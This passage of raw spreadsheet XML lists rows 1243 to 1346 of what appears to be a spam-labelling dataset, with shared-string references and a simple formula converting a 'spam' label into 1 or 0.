    <row r="1243" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1243" t="s">
        <v>6502</v>
      </c>
      <c r="B1243" t="s">
        <v>5294</v>
      </c>
      <c r="C1243" s="1">
        <f>IF(B1243="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1244" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1244" t="s">
        <v>6503</v>
      </c>
      <c r="B1244" t="s">
        <v>5294</v>
      </c>
      <c r="C1244" s="1">
        <f>IF(B1244="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1245" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1245" t="s">
        <v>6504</v>
      </c>
      <c r="B1245" t="s">
        <v>5294</v>
      </c>
      <c r="C1245" s="1">
        <f>IF(B1245="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1246" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1246" t="s">
        <v>6505</v>
      </c>
      <c r="B1246" t="s">
        <v>5294</v>
      </c>
      <c r="C1246" s="1">
        <f>IF(B1246="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1247" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1247" t="s">
        <v>6506</v>
      </c>
      <c r="B1247" t="s">
        <v>5294</v>
      </c>
      <c r="C1247" s="1">
        <f>IF(B1247="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1248" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1248" t="s">
        <v>6507</v>
      </c>
      <c r="B1248" t="s">
        <v>5294</v>
      </c>
      <c r="C1248" s="1">
        <f>IF(B1248="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1249" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1249" t="s">
        <v>6508</v>
      </c>
      <c r="B1249" t="s">
        <v>5294</v>
      </c>
      <c r="C1249" s="1">
        <f>IF(B1249="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1250" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1250" t="s">
        <v>6509</v>
      </c>
      <c r="B1250" t="s">
        <v>5294</v>
      </c>
      <c r="C1250" s="1">
        <f>IF(B1250="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1251" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1251" t="s">
        <v>5381</v>
      </c>
      <c r="B1251" t="s">
        <v>5294</v>
      </c>
      <c r="C1251" s="1">
        <f>IF(B1251="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1252" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1252" t="s">
        <v>5825</v>
      </c>
      <c r="B1252" t="s">
        <v>5294</v>
      </c>
      <c r="C1252" s="1">
        <f>IF(B1252="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1253" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1253" t="s">
        <v>6510</v>
      </c>
      <c r="B1253" t="s">
        <v>5297</v>
      </c>
      <c r="C1253" s="1">
        <f>IF(B1253="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1254" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1254" t="s">
        <v>6511</v>
      </c>
      <c r="B1254" t="s">
        <v>5294</v>
      </c>
      <c r="C1254" s="1">
        <f>IF(B1254="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1255" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1255" t="s">
        <v>6512</v>
      </c>
      <c r="B1255" t="s">
        <v>5294</v>
      </c>
      <c r="C1255" s="1">
        <f>IF(B1255="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1256" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1256" t="s">
        <v>6513</v>
      </c>
      <c r="B1256" t="s">
        <v>5294</v>
      </c>
      <c r="C1256" s="1">
        <f>IF(B1256="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1257" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1257" t="s">
        <v>6514</v>
      </c>
      <c r="B1257" t="s">
        <v>5294</v>
      </c>
      <c r="C1257" s="1">
        <f>IF(B1257="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1258" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1258" t="s">
        <v>6515</v>
      </c>
      <c r="B1258" t="s">
        <v>5294</v>
      </c>
      <c r="C1258" s="1">
        <f>IF(B1258="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1259" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1259" t="s">
        <v>6516</v>
      </c>
      <c r="B1259" t="s">
        <v>5294</v>
      </c>
      <c r="C1259" s="1">
        <f>IF(B1259="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1260" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1260" t="s">
        <v>6517</v>
      </c>
      <c r="B1260" t="s">
        <v>5294</v>
      </c>
      <c r="C1260" s="1">
        <f>IF(B1260="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1261" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1261" t="s">
        <v>6518</v>
      </c>
      <c r="B1261" t="s">
        <v>5294</v>
      </c>
      <c r="C1261" s="1">
        <f>IF(B1261="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1262" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1262" t="s">
        <v>6519</v>
      </c>
      <c r="B1262" t="s">
        <v>5294</v>
      </c>
      <c r="C1262" s="1">
        <f>IF(B1262="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1263" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1263" t="s">
        <v>6520</v>
      </c>
      <c r="B1263" t="s">
        <v>5294</v>
      </c>
      <c r="C1263" s="1">
        <f>IF(B1263="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1264" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1264" t="s">
        <v>6521</v>
      </c>
      <c r="B1264" t="s">
        <v>5297</v>
      </c>
      <c r="C1264" s="1">
        <f>IF(B1264="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1265" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1265" t="s">
        <v>6522</v>
      </c>
      <c r="B1265" t="s">
        <v>5294</v>
      </c>
      <c r="C1265" s="1">
        <f>IF(B1265="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1266" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1266" t="s">
        <v>6523</v>
      </c>
      <c r="B1266" t="s">
        <v>5294</v>
      </c>
      <c r="C1266" s="1">
        <f>IF(B1266="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1267" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1267" t="s">
        <v>6524</v>
      </c>
      <c r="B1267" t="s">
        <v>5294</v>
      </c>
      <c r="C1267" s="1">
        <f>IF(B1267="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1268" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1268" t="s">
        <v>6525</v>
      </c>
      <c r="B1268" t="s">
        <v>5294</v>
      </c>
      <c r="C1268" s="1">
        <f>IF(B1268="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1269" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1269" t="s">
        <v>6526</v>
      </c>
      <c r="B1269" t="s">
        <v>5294</v>
      </c>
      <c r="C1269" s="1">
        <f>IF(B1269="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1270" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1270" t="s">
        <v>6527</v>
      </c>
      <c r="B1270" t="s">
        <v>5297</v>
      </c>
      <c r="C1270" s="1">
        <f>IF(B1270="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1271" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1271" t="s">
        <v>6528</v>
      </c>
      <c r="B1271" t="s">
        <v>5294</v>
      </c>
      <c r="C1271" s="1">
        <f>IF(B1271="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1272" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1272" t="s">
        <v>6529</v>
      </c>
      <c r="B1272" t="s">
        <v>5294</v>
      </c>
      <c r="C1272" s="1">
        <f>IF(B1272="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1273" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1273" t="s">
        <v>6530</v>
      </c>
      <c r="B1273" t="s">
        <v>5294</v>
      </c>
      <c r="C1273" s="1">
        <f>IF(B1273="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1274" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1274" t="s">
        <v>6531</v>
      </c>
      <c r="B1274" t="s">
        <v>5294</v>
      </c>
      <c r="C1274" s="1">
        <f>IF(B1274="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1275" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1275" t="s">
        <v>6532</v>
      </c>
      <c r="B1275" t="s">
        <v>5297</v>
      </c>
      <c r="C1275" s="1">
        <f>IF(B1275="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1276" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1276" t="s">
        <v>6533</v>
      </c>
      <c r="B1276" t="s">
        <v>5294</v>
      </c>
      <c r="C1276" s="1">
        <f>IF(B1276="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1277" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1277" t="s">
        <v>6534</v>
      </c>
      <c r="B1277" t="s">
        <v>5294</v>
      </c>
      <c r="C1277" s="1">
        <f>IF(B1277="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1278" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1278" t="s">
        <v>6535</v>
      </c>
      <c r="B1278" t="s">
        <v>5294</v>
      </c>
      <c r="C1278" s="1">
        <f>IF(B1278="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1279" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1279" t="s">
        <v>6536</v>
      </c>
      <c r="B1279" t="s">
        <v>5294</v>
      </c>
      <c r="C1279" s="1">
        <f>IF(B1279="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1280" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1280" t="s">
        <v>6537</v>
      </c>
      <c r="B1280" t="s">
        <v>5294</v>
      </c>
      <c r="C1280" s="1">
        <f>IF(B1280="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1281" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1281" t="s">
        <v>6538</v>
      </c>
      <c r="B1281" t="s">
        <v>5294</v>
      </c>
      <c r="C1281" s="1">
        <f>IF(B1281="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1282" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1282" t="s">
        <v>6539</v>
      </c>
      <c r="B1282" t="s">
        <v>5294</v>
      </c>
      <c r="C1282" s="1">
        <f>IF(B1282="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1283" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1283" t="s">
        <v>6540</v>
      </c>
      <c r="B1283" t="s">
        <v>5294</v>
      </c>
      <c r="C1283" s="1">
        <f>IF(B1283="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1284" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1284" t="s">
        <v>6541</v>
      </c>
      <c r="B1284" t="s">
        <v>5294</v>
      </c>
      <c r="C1284" s="1">
        <f>IF(B1284="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1285" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1285" t="s">
        <v>6542</v>
      </c>
      <c r="B1285" t="s">
        <v>5294</v>
      </c>
      <c r="C1285" s="1">
        <f>IF(B1285="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1286" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1286" t="s">
        <v>6543</v>
      </c>
      <c r="B1286" t="s">
        <v>5294</v>
      </c>
      <c r="C1286" s="1">
        <f>IF(B1286="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1287" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1287" t="s">
        <v>6544</v>
      </c>
      <c r="B1287" t="s">
        <v>5294</v>
      </c>
      <c r="C1287" s="1">
        <f>IF(B1287="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1288" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1288" t="s">
        <v>6545</v>
      </c>
      <c r="B1288" t="s">
        <v>5294</v>
      </c>
      <c r="C1288" s="1">
        <f>IF(B1288="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1289" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1289" t="s">
        <v>6546</v>
      </c>
      <c r="B1289" t="s">
        <v>5294</v>
      </c>
      <c r="C1289" s="1">
        <f>IF(B1289="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1290" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1290" t="s">
        <v>6547</v>
      </c>
      <c r="B1290" t="s">
        <v>5294</v>
      </c>
      <c r="C1290" s="1">
        <f>IF(B1290="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1291" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1291" t="s">
        <v>6548</v>
      </c>
      <c r="B1291" t="s">
        <v>5294</v>
      </c>
      <c r="C1291" s="1">
        <f>IF(B1291="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1292" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1292" t="s">
        <v>6549</v>
      </c>
      <c r="B1292" t="s">
        <v>5294</v>
      </c>
      <c r="C1292" s="1">
        <f>IF(B1292="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1293" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1293" t="s">
        <v>6550</v>
      </c>
      <c r="B1293" t="s">
        <v>5294</v>
      </c>
      <c r="C1293" s="1">
        <f>IF(B1293="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1294" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1294" t="s">
        <v>6551</v>
      </c>
      <c r="B1294" t="s">
        <v>5294</v>
      </c>
      <c r="C1294" s="1">
        <f>IF(B1294="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1295" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1295" t="s">
        <v>6552</v>
      </c>
      <c r="B1295" t="s">
        <v>5294</v>
      </c>
      <c r="C1295" s="1">
        <f>IF(B1295="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1296" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1296" t="s">
        <v>6553</v>
      </c>
      <c r="B1296" t="s">
        <v>5294</v>
      </c>
      <c r="C1296" s="1">
        <f>IF(B1296="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1297" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1297" t="s">
        <v>6554</v>
      </c>
      <c r="B1297" t="s">
        <v>5294</v>
      </c>
      <c r="C1297" s="1">
        <f>IF(B1297="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1298" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1298" t="s">
        <v>6555</v>
      </c>
      <c r="B1298" t="s">
        <v>5294</v>
      </c>
      <c r="C1298" s="1">
        <f>IF(B1298="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1299" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1299" t="s">
        <v>6556</v>
      </c>
      <c r="B1299" t="s">
        <v>5294</v>
      </c>
      <c r="C1299" s="1">
        <f>IF(B1299="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1300" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1300" t="s">
        <v>6557</v>
      </c>
      <c r="B1300" t="s">
        <v>5294</v>
      </c>
      <c r="C1300" s="1">
        <f>IF(B1300="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1301" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1301" t="s">
        <v>6558</v>
      </c>
      <c r="B1301" t="s">
        <v>5294</v>
      </c>
      <c r="C1301" s="1">
        <f>IF(B1301="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1302" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1302" t="s">
        <v>6559</v>
      </c>
      <c r="B1302" t="s">
        <v>5294</v>
      </c>
      <c r="C1302" s="1">
        <f>IF(B1302="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1303" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1303" t="s">
        <v>6560</v>
      </c>
      <c r="B1303" t="s">
        <v>5294</v>
      </c>
      <c r="C1303" s="1">
        <f>IF(B1303="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1304" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1304" t="s">
        <v>6561</v>
      </c>
      <c r="B1304" t="s">
        <v>5294</v>
      </c>
      <c r="C1304" s="1">
        <f>IF(B1304="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1305" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1305" t="s">
        <v>5590</v>
      </c>
      <c r="B1305" t="s">
        <v>5294</v>
      </c>
      <c r="C1305" s="1">
        <f>IF(B1305="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1306" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1306" t="s">
        <v>6562</v>
      </c>
      <c r="B1306" t="s">
        <v>5294</v>
      </c>
      <c r="C1306" s="1">
        <f>IF(B1306="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1307" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1307" t="s">
        <v>6563</v>
      </c>
      <c r="B1307" t="s">
        <v>5294</v>
      </c>
      <c r="C1307" s="1">
        <f>IF(B1307="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1308" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1308" t="s">
        <v>6564</v>
      </c>
      <c r="B1308" t="s">
        <v>5297</v>
      </c>
      <c r="C1308" s="1">
        <f>IF(B1308="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1309" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1309" t="s">
        <v>6565</v>
      </c>
      <c r="B1309" t="s">
        <v>5297</v>
      </c>
      <c r="C1309" s="1">
        <f>IF(B1309="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1310" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1310" t="s">
        <v>6566</v>
      </c>
      <c r="B1310" t="s">
        <v>5294</v>
      </c>
      <c r="C1310" s="1">
        <f>IF(B1310="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1311" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1311" t="s">
        <v>6567</v>
      </c>
      <c r="B1311" t="s">
        <v>5294</v>
      </c>
      <c r="C1311" s="1">
        <f>IF(B1311="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1312" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1312" t="s">
        <v>6568</v>
      </c>
      <c r="B1312" t="s">
        <v>5294</v>
      </c>
      <c r="C1312" s="1">
        <f>IF(B1312="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1313" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1313" t="s">
        <v>6569</v>
      </c>
      <c r="B1313" t="s">
        <v>5294</v>
      </c>
      <c r="C1313" s="1">
        <f>IF(B1313="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1314" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1314" t="s">
        <v>6570</v>
      </c>
      <c r="B1314" t="s">
        <v>5294</v>
      </c>
      <c r="C1314" s="1">
        <f>IF(B1314="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1315" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1315" t="s">
        <v>6571</v>
      </c>
      <c r="B1315" t="s">
        <v>5294</v>
      </c>
      <c r="C1315" s="1">
        <f>IF(B1315="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1316" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1316" t="s">
        <v>6572</v>
      </c>
      <c r="B1316" t="s">
        <v>5294</v>
      </c>
      <c r="C1316" s="1">
        <f>IF(B1316="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1317" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1317" t="s">
        <v>6573</v>
      </c>
      <c r="B1317" t="s">
        <v>5294</v>
      </c>
      <c r="C1317" s="1">
        <f>IF(B1317="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1318" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1318" t="s">
        <v>6574</v>
      </c>
      <c r="B1318" t="s">
        <v>5294</v>
      </c>
      <c r="C1318" s="1">
        <f>IF(B1318="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1319" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1319" t="s">
        <v>6575</v>
      </c>
      <c r="B1319" t="s">
        <v>5297</v>
      </c>
      <c r="C1319" s="1">
        <f>IF(B1319="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1320" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1320" t="s">
        <v>6531</v>
      </c>
      <c r="B1320" t="s">
        <v>5294</v>
      </c>
      <c r="C1320" s="1">
        <f>IF(B1320="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1321" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1321" t="s">
        <v>6576</v>
      </c>
      <c r="B1321" t="s">
        <v>5294</v>
      </c>
      <c r="C1321" s="1">
        <f>IF(B1321="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1322" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1322" t="s">
        <v>6577</v>
      </c>
      <c r="B1322" t="s">
        <v>5294</v>
      </c>
      <c r="C1322" s="1">
        <f>IF(B1322="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1323" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1323" t="s">
        <v>6578</v>
      </c>
      <c r="B1323" t="s">
        <v>5294</v>
      </c>
      <c r="C1323" s="1">
        <f>IF(B1323="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1324" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1324" t="s">
        <v>6579</v>
      </c>
      <c r="B1324" t="s">
        <v>5294</v>
      </c>
      <c r="C1324" s="1">
        <f>IF(B1324="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1325" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1325" t="s">
        <v>6580</v>
      </c>
      <c r="B1325" t="s">
        <v>5294</v>
      </c>
      <c r="C1325" s="1">
        <f>IF(B1325="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1326" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1326" t="s">
        <v>6581</v>
      </c>
      <c r="B1326" t="s">
        <v>5294</v>
      </c>
      <c r="C1326" s="1">
        <f>IF(B1326="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1327" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1327" t="s">
        <v>6582</v>
      </c>
      <c r="B1327" t="s">
        <v>5294</v>
      </c>
      <c r="C1327" s="1">
        <f>IF(B1327="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1328" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1328" t="s">
        <v>6583</v>
      </c>
      <c r="B1328" t="s">
        <v>5294</v>
      </c>
      <c r="C1328" s="1">
        <f>IF(B1328="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1329" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1329" t="s">
        <v>6584</v>
      </c>
      <c r="B1329" t="s">
        <v>5297</v>
      </c>
      <c r="C1329" s="1">
        <f>IF(B1329="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1330" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1330" t="s">
        <v>6585</v>
      </c>
      <c r="B1330" t="s">
        <v>5294</v>
      </c>
      <c r="C1330" s="1">
        <f>IF(B1330="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1331" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1331" t="s">
        <v>6586</v>
      </c>
      <c r="B1331" t="s">
        <v>5294</v>
      </c>
      <c r="C1331" s="1">
        <f>IF(B1331="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1332" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1332" t="s">
        <v>6587</v>
      </c>
      <c r="B1332" t="s">
        <v>5294</v>
      </c>
      <c r="C1332" s="1">
        <f>IF(B1332="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1333" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1333" t="s">
        <v>6588</v>
      </c>
      <c r="B1333" t="s">
        <v>5294</v>
      </c>
      <c r="C1333" s="1">
        <f>IF(B1333="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1334" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1334" t="s">
        <v>6589</v>
      </c>
      <c r="B1334" t="s">
        <v>5294</v>
      </c>
      <c r="C1334" s="1">
        <f>IF(B1334="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1335" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1335" t="s">
        <v>6590</v>
      </c>
      <c r="B1335" t="s">
        <v>5294</v>
      </c>
      <c r="C1335" s="1">
        <f>IF(B1335="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1336" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1336" t="s">
        <v>6591</v>
      </c>
      <c r="B1336" t="s">
        <v>5294</v>
      </c>
      <c r="C1336" s="1">
        <f>IF(B1336="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1337" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1337" t="s">
        <v>6592</v>
      </c>
      <c r="B1337" t="s">
        <v>5294</v>
      </c>
      <c r="C1337" s="1">
        <f>IF(B1337="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1338" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1338" t="s">
        <v>6593</v>
      </c>
      <c r="B1338" t="s">
        <v>5294</v>
      </c>
      <c r="C1338" s="1">
        <f>IF(B1338="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1339" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1339" t="s">
        <v>6594</v>
      </c>
      <c r="B1339" t="s">
        <v>5294</v>
      </c>
      <c r="C1339" s="1">
        <f>IF(B1339="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1340" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1340" t="s">
        <v>6595</v>
      </c>
      <c r="B1340" t="s">
        <v>5294</v>
      </c>
      <c r="C1340" s="1">
        <f>IF(B1340="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1341" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1341" t="s">
        <v>6596</v>
      </c>
      <c r="B1341" t="s">
        <v>5294</v>
      </c>
      <c r="C1341" s="1">
        <f>IF(B1341="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1342" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1342" t="s">
        <v>6597</v>
      </c>
      <c r="B1342" t="s">
        <v>5294</v>
      </c>
      <c r="C1342" s="1">
        <f>IF(B1342="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1343" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1343" t="s">
        <v>6598</v>
      </c>
      <c r="B1343" t="s">
        <v>5294</v>
      </c>
      <c r="C1343" s="1">
        <f>IF(B1343="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1344" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1344" t="s">
        <v>6599</v>
      </c>
      <c r="B1344" t="s">
        <v>5294</v>
      </c>
      <c r="C1344" s="1">
        <f>IF(B1344="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1345" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1345" t="s">
        <v>6600</v>
      </c>
      <c r="B1345" t="s">
        <v>5294</v>
      </c>
      <c r="C1345" s="1">
        <f>IF(B1345="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1346" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1346" t="s">
        <v>6601</v>
      </c>
      <c r="B1346" t="s">
        <v>5294</v>
      </c>
      <c r="C1346" s="1">
        <f>IF(B1346="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
